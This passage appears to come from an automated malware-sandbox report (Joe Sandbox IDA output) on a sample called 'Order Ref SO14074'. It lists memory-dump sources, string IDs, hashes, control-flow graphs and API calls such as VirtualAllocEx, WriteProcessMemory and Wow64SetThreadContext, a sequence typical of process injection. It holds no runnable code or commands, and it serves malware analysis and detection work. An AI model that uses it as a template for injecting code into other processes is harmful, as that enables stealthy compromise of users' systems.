1663->1650 1673->1661 1674->1673 1715->1716 1716->1663 1718->1648 1719->1648
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2204858948.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7240000_Order Ref SO14074.jbxd
                                Similarity
                                • API ID:
                                • String ID: (gq$(gq$Hgq
                                • API String ID: 0-3837630004
                                • Opcode ID: 7e757ed88a2a9e8e7dac00953650a34e644a2f4d5beb0cabc43ef69dbac56923
                                • Instruction ID: 780f84a31b640ffed08eeda74787d95b648d6b76c0900d9aa440177cb9d18128
                                • Opcode Fuzzy Hash: 7e757ed88a2a9e8e7dac00953650a34e644a2f4d5beb0cabc43ef69dbac56923
                                • Instruction Fuzzy Hash: BBE15A74A11209DFCB08EFA8D4949ADBBB6FF89300F118559E806AB355DF30ED85CB91
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2204099786.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7120000_Order Ref SO14074.jbxd
                                Similarity
                                • API ID:
                                • String ID: 4'cq$4'cq
                                • API String ID: 0-60795322
                                • Opcode ID: 55d2d46d1d0ae33a8580bf2b3bd34eae0489f67ad0dbd0e8d860af0b2b1dc3ef
                                • Instruction ID: 4033ff4b8a4d65b563811cf2790fb63ce075647aafe8bb6f8b19c0b608ab5881
                                • Opcode Fuzzy Hash: 55d2d46d1d0ae33a8580bf2b3bd34eae0489f67ad0dbd0e8d860af0b2b1dc3ef
                                • Instruction Fuzzy Hash: 1342F5B4E1421ACFCB19CF98D588AADBBB2FF89300F128059D9127B290C7395997DF51

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2606 71229d0-71229f8 2607 71229fa 2606->2607 2608 71229ff-7122a28 2606->2608 2607->2608 2609 7122a2a-7122a33 2608->2609 2610 7122a49 2608->2610 2611 7122a35-7122a38 2609->2611 2612 7122a3a-7122a3d 2609->2612 2613 7122a4c-7122a50 2610->2613 2614 7122a47 2611->2614 2612->2614 2615 7122e07-7122e1e 2613->2615 2614->2613 2617 7122e24-7122e28 2615->2617 2618 7122a55-7122a59 2615->2618 2619 7122e2a-7122e5a 2617->2619 2620 7122e5d-7122e61 2617->2620 2621 7122a5b-7122ab8 2618->2621 2622 7122a5e-7122a62 2618->2622 2619->2620 2623 7122e82 2620->2623 2624 7122e63-7122e6c 2620->2624 2631 7122aba-7122b2b 2621->2631 2632 7122abd-7122ac1 2621->2632 2626 7122a64-7122a88 2622->2626 2627 7122a8b-7122aaf 2622->2627 2630 7122e85-7122e8b 2623->2630 2628 7122e73-7122e76 2624->2628 2629 7122e6e-7122e71 2624->2629 2626->2627 2627->2615 2634 7122e80 2628->2634 2629->2634 2640 7122b30-7122b34 2631->2640 2641 7122b2d-7122b8a 2631->2641 2637 7122ac3-7122ae7 2632->2637 2638 7122aea-7122b11 2632->2638 2634->2630 2637->2638 2661 7122b13-7122b19 2638->2661 2662 7122b21-7122b22 2638->2662 2647 7122b36-7122b5a 2640->2647 2648 7122b5d-7122b81 2640->2648 2650 7122b8f-7122b93 2641->2650 2651 7122b8c-7122be8 2641->2651 2647->2648 2648->2615 2657 7122b95-7122bb9 2650->2657 2658 7122bbc-7122bbf 2650->2658 2663 7122bea-7122c4c 2651->2663 2664 7122bed-7122bf1 2651->2664 2657->2658 2667 7122bc7-7122bdf 2658->2667 2661->2662 2662->2615 2673 7122c51-7122c55 2663->2673 2674 7122c4e-7122cb0 2663->2674 2670 7122bf3-7122c17 2664->2670 2671 7122c1a-7122c32 2664->2671 2667->2615 2670->2671 2683 7122c42-7122c43 2671->2683 2684 7122c34-7122c3a 2671->2684 2680 7122c57-7122c7b 2673->2680 2681 7122c7e-7122c96 2673->2681 2685 7122cb2-7122d14 2674->2685 2686 7122cb5-7122cb9 2674->2686 2680->2681 2694 7122ca6-7122ca7 2681->2694 2695 7122c98-7122c9e 2681->2695 2683->2615 2684->2683 2696 7122d16-7122d78 2685->2696 2697 7122d19-7122d1d 2685->2697 2690 7122ce2-7122cfa 2686->2690 2691 7122cbb-7122cdf 2686->2691 2705 7122d0a-7122d0b 2690->2705 2706 7122cfc-7122d02 2690->2706 2691->2690 2694->2615 2695->2694 2707 7122d7a-7122dd3 2696->2707 2708 7122d7d-7122d81 2696->2708 2701 7122d46-7122d5e 2697->2701 2702 7122d1f-7122d43 2697->2702 2716 7122d60-7122d66 2701->2716 2717 7122d6e-7122d6f 2701->2717 2702->2701 2705->2615 2706->2705 2718 7122dd5-7122df9 2707->2718 2719 7122dfc-7122dff 2707->2719 2712 7122d83-7122da7 2708->2712 2713 7122daa-7122dcd 2708->2713 2712->2713 2713->2615 2716->2717 2717->2615 2718->2719 2719->2615
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2204099786.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7120000_Order Ref SO14074.jbxd
                                Similarity
                                • API ID:
                                • String ID: 4'cq$4'cq
                                • API String ID: 0-60795322
                                • Opcode ID: b4274696a01439eec5d3270e3403e3e791707275172286f6502c190ac916e939
                                • Instruction ID: 5b868578e7d951478ce78314701c974a5217a2e167209e06157794d547e536aa
                                • Opcode Fuzzy Hash: b4274696a01439eec5d3270e3403e3e791707275172286f6502c190ac916e939
                                • Instruction Fuzzy Hash: 04F1E1B0E11219EFCB19DFA4E5886ACBFB2FF89311F214069E406B7290CB355996DF01

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2731 7245800-7245812 2732 7245814-7245835 2731->2732 2733 724583c-7245840 2731->2733 2732->2733 2734 7245842-7245844 2733->2734 2735 724584c-724585b 2733->2735 2734->2735 2736 7245867-7245893 2735->2736 2737 724585d 2735->2737 2741 7245ac0-7245b07 2736->2741 2742 7245899-724589f 2736->2742 2737->2736 2774 7245b1d-7245b29 2741->2774 2775 7245b09 2741->2775 2744 72458a5-72458ab 2742->2744 2745 7245971-7245975 2742->2745 2744->2741 2748 72458b1-72458be 2744->2748 2746 7245977-7245980 2745->2746 2747 7245998-72459a1 2745->2747 2746->2741 2751 7245986-7245996 2746->2751 2754 72459c6-72459c9 2747->2754 2755 72459a3-72459c3 2747->2755 2752 72458c4-72458cd 2748->2752 2753 7245950-7245959 2748->2753 2756 72459cc-72459d2 2751->2756 2752->2741 2758 72458d3-72458eb 2752->2758 2753->2741 2757 724595f-724596b 2753->2757 2754->2756 2755->2754 2756->2741 2760 72459d8-72459eb 2756->2760 2757->2744 2757->2745 2761 72458f7-7245909 2758->2761 2762 72458ed 2758->2762 2760->2741 2765 72459f1-7245a01 2760->2765 2761->2753 2769 724590b-7245911 2761->2769 2762->2761 2765->2741 2766 7245a07-7245a14 2765->2766 2766->2741 2771 7245a1a-7245a2f 2766->2771 2772 7245913 2769->2772 2773 724591d-7245923 2769->2773 2771->2741 2783 7245a35-7245a58 2771->2783 2772->2773 2773->2741 2776 7245929-724594d 2773->2776 2779 7245b35-7245b51 2774->2779 2780 7245b2b 2774->2780 2777 7245b0c-7245b0e 2775->2777 2781 7245b10-7245b1b 2777->2781 2782 7245b52-7245b58 2777->2782 2780->2779 2781->2774 2781->2777 2788 7245b7c-7245b7f 2782->2788 2789 7245b5a-7245b78 call 7241070 2782->2789 2783->2741 2790 7245a5a-7245a65 2783->2790 2793 7245b97-7245b99 2788->2793 2794 7245b81-7245b87 2788->2794 2789->2788 2795 7245ab6-7245abd 2790->2795 2796 7245a67-7245a71 2790->2796 2819 7245b9b call 7246a20 2793->2819 2820 7245b9b call 72469d0 2793->2820 2821 7245b9b call 7245c18 2793->2821 2797 7245b89 2794->2797 2798 7245b8b-7245b8d 2794->2798 2796->2795 2803 7245a73-7245a89 2796->2803 2797->2793 2798->2793 2799 7245ba1-7245ba5 2801 7245ba7-7245bbe 2799->2801 2802 7245bf0-7245c00 2799->2802 2801->2802 2810 7245bc0-7245bca 2801->2810 2807 7245a95-7245aae 2803->2807 2808 7245a8b 2803->2808 2807->2795 2808->2807 2814 7245bcc-7245bdb 2810->2814 2815 7245bdd-7245bed 2810->2815 2814->2815 2819->2799 2820->2799 2821->2799
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2204858948.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7240000_Order Ref SO14074.jbxd
                                Similarity
                                • API ID:
                                • String ID: (gq$d
                                • API String ID: 0-4050097227
                                • Opcode ID: 355aa351bd386265b6a407ec5e8665386755ffb7d64965aef7c954c4938d174c
                                • Instruction ID: 9577231a31b93f9f4b3c4e2e293862fd4965b99837e95cbf84ca0863fc9d86b4
                                • Opcode Fuzzy Hash: 355aa351bd386265b6a407ec5e8665386755ffb7d64965aef7c954c4938d174c
                                • Instruction Fuzzy Hash: 94D18C71610616CFCB19CF29C48496ABBF6FF88310B29C959D49A8B365DB30FC56CB90
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2204858948.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7240000_Order Ref SO14074.jbxd
                                Similarity
                                • API ID:
                                • String ID: (gq$Hgq
                                • API String ID: 0-3303014377
                                • Opcode ID: 2d2545fd318f756d9e5d2348900338a5323211fae82d5606aeaef65fcea81fec
                                • Instruction ID: 5e8e4356082f67f7ebf762dd6aebbaadbe71cbc684a9350cfe33a6d47a2c7803
                                • Opcode Fuzzy Hash: 2d2545fd318f756d9e5d2348900338a5323211fae82d5606aeaef65fcea81fec
                                • Instruction Fuzzy Hash: 91518B30B0025A8FC759AF78C86452E7BB7AF85200B24486ED5468B3E1DF31DD86C791
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2204858948.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7240000_Order Ref SO14074.jbxd
                                Similarity
                                • API ID:
                                • String ID: (gq$(gq
                                • API String ID: 0-3425431731
                                • Opcode ID: 61a071e3a6a7c77a0ddad9c6b08a258fde14bb11bf0de208e43b5d1916aebf65
                                • Instruction ID: 836ead2c3829bad9339c282fd42606e763a2235e63e867b2157828b2f04f1761
                                • Opcode Fuzzy Hash: 61a071e3a6a7c77a0ddad9c6b08a258fde14bb11bf0de208e43b5d1916aebf65
                                • Instruction Fuzzy Hash: FE519D317102069FDB19DF29D864AAE3BA6FF88344F218469E905CB2D2CF39DC46C791
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2200454073.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6500000_Order Ref SO14074.jbxd
                                Similarity
                                • API ID:
                                • String ID: ?{c$s
                                • API String ID: 0-1127728444
                                • Opcode ID: a8b2ba5c8408abacf6e7be4306200900ee944b4e94b39ba0389c97a72a595129
                                • Instruction ID: 44c4d4ae8b5951db0fdb35c01c6acb539251ddc0d91aef638a4c58d5eca85991
                                • Opcode Fuzzy Hash: a8b2ba5c8408abacf6e7be4306200900ee944b4e94b39ba0389c97a72a595129
                                • Instruction Fuzzy Hash: D511B7B4A00218CFDB64DF24D895A9EB7F2FF89200F4142E9E50AA7250DB356E84CF49
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2204858948.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7240000_Order Ref SO14074.jbxd
                                Similarity
                                • API ID:
                                • String ID: ,gq
                                • API String ID: 0-3993090981
                                • Opcode ID: 75bfb63a7acf9e4b1a625203786482f40ee2cf4cb740b8d9c73e0ca2dc352ac4
                                • Instruction ID: 793654945e4cf0ed4a9f4d5a320272a6ba68e74c3bb5eda023667dffda05c014
                                • Opcode Fuzzy Hash: 75bfb63a7acf9e4b1a625203786482f40ee2cf4cb740b8d9c73e0ca2dc352ac4
                                • Instruction Fuzzy Hash: 03520CB5A102298FDB68DF68C950BEDBBF2BF88300F1541D9E549A7391DA309D84CF61
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2204858948.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7240000_Order Ref SO14074.jbxd
                                Similarity
                                • API ID:
                                • String ID: (_cq
                                • API String ID: 0-1257261198
                                • Opcode ID: 2a7500fe9c568e1fe18cbe6bf739332895decef1f9b98f4ecf6049030117fcfd
                                • Instruction ID: deae52590da663ba66c2fd2decd2bcb522b8f2a8b50f61f5fa3d3bf8d7a9f8d5
                                • Opcode Fuzzy Hash: 2a7500fe9c568e1fe18cbe6bf739332895decef1f9b98f4ecf6049030117fcfd
                                • Instruction Fuzzy Hash: CA226E75A20206DFDB09DFA5D890AADBBF6FF88310F158059E905AB391CB71ED44CB50
                                APIs
                                • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 07229CFA
                                Memory Dump Source
                                • Source File: 00000000.00000002.2204768820.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7220000_Order Ref SO14074.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID:
                                • API String ID: 963392458-0
                                • Opcode ID: 4d837f94a5b655db748473037976f737165387400e0bc446bc9f0a1dd97e6509
                                • Instruction ID: 6f857dcaae7100d3fa6433f31a603ac9c2333d5d7930d76c6fd2437d5f3f3bbd
                                • Opcode Fuzzy Hash: 4d837f94a5b655db748473037976f737165387400e0bc446bc9f0a1dd97e6509
                                • Instruction Fuzzy Hash: B28169B1D1022AAFDB10DFA9C8857EDBBF5BF48310F148129E895E7254DB749882DF81
                                APIs
                                • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 07229CFA
                                Memory Dump Source
                                • Source File: 00000000.00000002.2204768820.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7220000_Order Ref SO14074.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID:
                                • API String ID: 963392458-0
                                • Opcode ID: db425d334a1e422b1b0d3c00bfed872c9c03b9c4bd65c3ccd22c038d3dfb0354
                                • Instruction ID: 9423f00f77dabbcf14a6a6424e6bd55b97eec0bda363934bfc4a1476d0534037
                                • Opcode Fuzzy Hash: db425d334a1e422b1b0d3c00bfed872c9c03b9c4bd65c3ccd22c038d3dfb0354
                                • Instruction Fuzzy Hash: E38178B1D1022A9FDB10DFA9C8857EDBBF5BF48310F148129E895E7254DB749882DF81
                                APIs
                                • GetModuleHandleW.KERNEL32(00000000), ref: 02A7A57E
                                Memory Dump Source
                                • Source File: 00000000.00000002.2182244636.0000000002A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2a70000_Order Ref SO14074.jbxd
                                Similarity
                                • API ID: HandleModule
                                • String ID:
                                • API String ID: 4139908857-0
                                • Opcode ID: b7b780153aa77781febc17474c93e9e23eb9697166947d770f3d1cc9942481c8
                                • Instruction ID: c11ffef4b7d88dbe7567c9cba5b6f63c6d2d70b41ea97878e00a45406a0ebd87
                                • Opcode Fuzzy Hash: b7b780153aa77781febc17474c93e9e23eb9697166947d770f3d1cc9942481c8
                                • Instruction Fuzzy Hash: 488148B0A00B059FD724DF29D89475ABBF5FF88304F008A2ED48AD7A41DB35E949CB95
                                APIs
                                • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 0722AC28
                                Memory Dump Source
                                • Source File: 00000000.00000002.2204768820.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7220000_Order Ref SO14074.jbxd
                                Similarity
                                • API ID: MemoryProcessWrite
                                • String ID:
                                • API String ID: 3559483778-0
                                • Opcode ID: 74b767c66db30460c7e8cb037732d8458030394c3d552cff5ea6f83c8a71b42e
                                • Instruction ID: d57120f0d1ba1e567f192832f28249f0642426d70be7c68a82694f006b9b8e57
                                • Opcode Fuzzy Hash: 74b767c66db30460c7e8cb037732d8458030394c3d552cff5ea6f83c8a71b42e
                                • Instruction Fuzzy Hash: 3A2139B5D103599FCB10CFA9C885BDEBBF5FF88310F10842AE919A7240D7789945DBA1
                                APIs
                                • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 0722AC28
                                Memory Dump Source
                                • Source File: 00000000.00000002.2204768820.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7220000_Order Ref SO14074.jbxd
                                Similarity
                                • API ID: MemoryProcessWrite
                                • String ID:
                                • API String ID: 3559483778-0
                                • Opcode ID: 1a2b50318c3117dfb7f1ac8bfbefa67f40299680c527c2d8a22748269c5bb941
                                • Instruction ID: de43756c470c044443c708b8e423f567b5c1ff5400af30c4abdb9094b0b9364d
                                • Opcode Fuzzy Hash: 1a2b50318c3117dfb7f1ac8bfbefa67f40299680c527c2d8a22748269c5bb941
                                • Instruction Fuzzy Hash: 5A2146B1D103599FCB10CFA9C885BDEBBF5FF48310F108429E919A7240C7789945DBA1
                                APIs
                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0722A36E
                                Memory Dump Source
                                • Source File: 00000000.00000002.2204768820.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7220000_Order Ref SO14074.jbxd
                                Similarity
                                • API ID: ContextThreadWow64
                                • String ID:
                                • API String ID: 983334009-0
                                • Opcode ID: dfcfadb296126a0695886c89cadf7d70709dae86ee5a5d3541b9b2898e72bf2e
                                • Instruction ID: eb5aa7f775f4b244d1dba80c821de8a297987a7491c7f0822ad6e7c58b40a095
                                • Opcode Fuzzy Hash: dfcfadb296126a0695886c89cadf7d70709dae86ee5a5d3541b9b2898e72bf2e
                                • Instruction Fuzzy Hash: F62189B1D102099FDB10CFAAC4857EEBBF4EF89320F10842AD519A7640CB389945CFA1
                                APIs
                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02A7CC97
                                Memory Dump Source
                                • Source File: 00000000.00000002.2182244636.0000000002A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2a70000_Order Ref SO14074.jbxd
                                Similarity
                                • API ID: DuplicateHandle
                                • String ID:
                                • API String ID: 3793708945-0
                                • Opcode ID: 07e033d0a4baa3c6f48510ed8e53af88d3bd501ec323f23094247da235ad9506
                                • Instruction ID: 37aa3559ed64792b4d9494bddbbf9b1eaa7015ecdde47c09b35364f2cea6f0d3
                                • Opcode Fuzzy Hash: 07e033d0a4baa3c6f48510ed8e53af88d3bd501ec323f23094247da235ad9506
                                • Instruction Fuzzy Hash: 5A21E6B5D002099FDB10CFAAD984ADEBBF9EB48320F14845AE918A7310D378A954CF65
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,?,?), ref: 07198B9C
                                Memory Dump Source
                                • Source File: 00000000.00000002.2204665157.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7190000_Order Ref SO14074.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: d407848a369c3422561c8b5ab9875a786e4c000664036ef98add207b3849d19b
                                • Instruction ID: 92aacab9a30b34e63d1b80441dff2624e110207664f4fde09c7e73ff2f9f7cb7
                                • Opcode Fuzzy Hash: d407848a369c3422561c8b5ab9875a786e4c000664036ef98add207b3849d19b
                                • Instruction Fuzzy Hash: 6D2107B1D002199FDB20DFAAC845BEFBBF4EF89324F548429E419A7240C77999458FA1
                                APIs
                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0722A36E
                                Memory Dump Source
                                • Source File: 00000000.00000002.2204768820.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7220000_Order Ref SO14074.jbxd
                                Similarity
                                • API ID: ContextThreadWow64
                                • String ID:
                                • API String ID: 983334009-0
                                • Opcode ID: 2e349cae1b299b8245d31a366a3fcc60d08e235b34a623a7e4ca993dfd7a39f5
                                • Instruction ID: 4a696fba9e4718dde856dc770180e14a5e5990d6943920ae71058b22e0cb2943
                                • Opcode Fuzzy Hash: 2e349cae1b299b8245d31a366a3fcc60d08e235b34a623a7e4ca993dfd7a39f5
                                • Instruction Fuzzy Hash: 8A2149B1D103199FDB10DFAAC4857EEBBF4EF89324F108429D419A7240CB789945CFA1
                                APIs
                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02A7CC97
                                Memory Dump Source
                                • Source File: 00000000.00000002.2182244636.0000000002A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2a70000_Order Ref SO14074.jbxd
                                Similarity
                                • API ID: DuplicateHandle
                                • String ID:
                                • API String ID: 3793708945-0
                                • Opcode ID: afb4adeaf1156e34eb96eb48e3004b43d2610843a2391da6a01a42bb9d0c3d0a
                                • Instruction ID: b267b5b7a4fff7580f14f68e7c25ff05608989ecb5271e519b19dbfc1d53e315
                                • Opcode Fuzzy Hash: afb4adeaf1156e34eb96eb48e3004b43d2610843a2391da6a01a42bb9d0c3d0a
                                • Instruction Fuzzy Hash: 8C21E4B5D002099FDB10CF9AD984ADEBBF9EB48320F14841AE918A3310C378A944CF65
                                APIs
                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0722A96E
                                Memory Dump Source
                                • Source File: 00000000.00000002.2204768820.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7220000_Order Ref SO14074.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: 6c200c6ce3eb4637587b39affbcf6840ac61e0f951c52abbc57732c2214e80fd
                                • Instruction ID: 96890d18c89b7b67f5beb9bc4f243e515285971903c1068d7de340f2c7c587ec
                                • Opcode Fuzzy Hash: 6c200c6ce3eb4637587b39affbcf6840ac61e0f951c52abbc57732c2214e80fd
                                • Instruction Fuzzy Hash: FD218BB190024A9FCB10CFAAC845AEEFFF5EF88324F248419E459A7610C735A541DFA1
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,?,?), ref: 07198B9C
                                Memory Dump Source
                                • Source File: 00000000.00000002.2204665157.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7190000_Order Ref SO14074.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: 346a4084451e766dd12e3a20ff6789101bd4a878b5971773050c0bbfa3441d3e
                                • Instruction ID: ea19a36512bf01974ed61c878077af277818a8f894de93c408ad99a8251088f5
                                • Opcode Fuzzy Hash: 346a4084451e766dd12e3a20ff6789101bd4a878b5971773050c0bbfa3441d3e
                                • Instruction Fuzzy Hash: EE2127B1D002099FDB10DFAAC445BEEFBF4EF88320F548429D419A7240C7789945CFA1
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.2204665157.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7190000_Order Ref SO14074.jbxd
                                Similarity
                                • API ID: Sleep
                                • String ID:
                                • API String ID: 3472027048-0
                                • Opcode ID: 9703dc123352568b99c03e227625bd50e21113b865d9d7050ca0b257e4edc4be
                                • Instruction ID: 245513ceae037760aeba2b60e2da662b23e52208276db8fb70663fdbf3c2f8a5
                                • Opcode Fuzzy Hash: 9703dc123352568b99c03e227625bd50e21113b865d9d7050ca0b257e4edc4be
                                • Instruction Fuzzy Hash: 8F115CB1D102599EDB10DFAAC4446EFFFF8AF88310F14841AD459A7240CB399945CBA5
                                APIs
                                • VirtualProtect.KERNEL32(?,?,?,?), ref: 070DE994
                                Memory Dump Source
                                • Source File: 00000000.00000002.2204007535.00000000070D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_70d0000_Order Ref SO14074.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: 201ecd3991e6617ca31a5e36c4bd2b2f18ea53e58c799d7d0680e02e46da8946
                                • Instruction ID: cfc068be4438b3374353681e9b1fe8e8ec7e4550a3a5354aef4985762700e9b5
                                • Opcode Fuzzy Hash: 201ecd3991e6617ca31a5e36c4bd2b2f18ea53e58c799d7d0680e02e46da8946
                                • Instruction Fuzzy Hash: 0811F4B1D003499FDB10DFAAC844A9EFBF5EF88320F10842AD419A7250C779A945CFA1
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.2204665157.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7190000_Order Ref SO14074.jbxd
                                Similarity
                                • API ID: Sleep
                                • String ID:
                                • API String ID: 3472027048-0
                                • Opcode ID: e4a31276182d931273c9515dd0347f1b6bdab74197ba0b5497784e68932b6ade
                                • Instruction ID: c406cffcbc680f2b9762849bc44d30ba8e61c12be79e4a22de3f940b6e5c9026
                                • Opcode Fuzzy Hash: e4a31276182d931273c9515dd0347f1b6bdab74197ba0b5497784e68932b6ade
                                • Instruction Fuzzy Hash: CC113AB1D102598FDB10DFAAC4457EEFFF8AF89324F14841AD459A7240C7389945CBA5
                                APIs
                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0722A96E
                                Memory Dump Source
                                • Source File: 00000000.00000002.2204768820.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7220000_Order Ref SO14074.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: b45bb5b6b8a55400185c6aac330f295821760c78ee411f565da55a615693127b
                                • Instruction ID: 73dfaea3b778c8dc9b8a93bb4b4971a2ebda1dc5d6c9b2af95389f1bac752d23
                                • Opcode Fuzzy Hash: b45bb5b6b8a55400185c6aac330f295821760c78ee411f565da55a615693127b
                                • Instruction Fuzzy Hash: 761159B1D002499FCB10DFAAC844ADEBFF5EF88324F208819E519A7250C7359940DFA1
                                APIs
                                • GetModuleHandleW.KERNEL32(00000000), ref: 02A7A57E
                                Memory Dump Source
                                • Source File: 00000000.00000002.2182244636.0000000002A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2a70000_Order Ref SO14074.jbxd
                                Similarity
                                • API ID: HandleModule
                                • String ID:
                                • API String ID: 4139908857-0
                                • Opcode ID: 2d73ecbdd4d1c2f767043bf7ae7f09b31a8a43b72961f28a25dab36a954ef74e
                                • Instruction ID: 4afaddd3449b46e3497f29a1319cde522607bc48540dff401ad505ee56084d2a
                                • Opcode Fuzzy Hash: 2d73ecbdd4d1c2f767043bf7ae7f09b31a8a43b72961f28a25dab36a954ef74e
                                • Instruction Fuzzy Hash: 7B11E0B5D003499FDB10CF9AD844ADEFBF8EB88324F10845AD419A7210D379A545CFA5
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2204858948.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7240000_Order Ref SO14074.jbxd
                                Similarity
                                • API ID:
                                • String ID: ,gq
                                • API String ID: 0-3993090981
                                • Opcode ID: cce4462c949fad13f22e8f20c0e4f991cc0e5915b17553117bcfa02eddb142ed
                                • Instruction ID: 59f3212e5623f091ed9e6054a2a9a1fc9a1199d083b172d1c5628f845da5a3a7
                                • Opcode Fuzzy Hash: cce4462c949fad13f22e8f20c0e4f991cc0e5915b17553117bcfa02eddb142ed
                                • Instruction Fuzzy Hash: F2C14EB4A101198FDB18DB69C955BDDBBF6BF88700F158099E609AB390CB309D81CFA1
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2204858948.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7240000_Order Ref SO14074.jbxd
                                Similarity
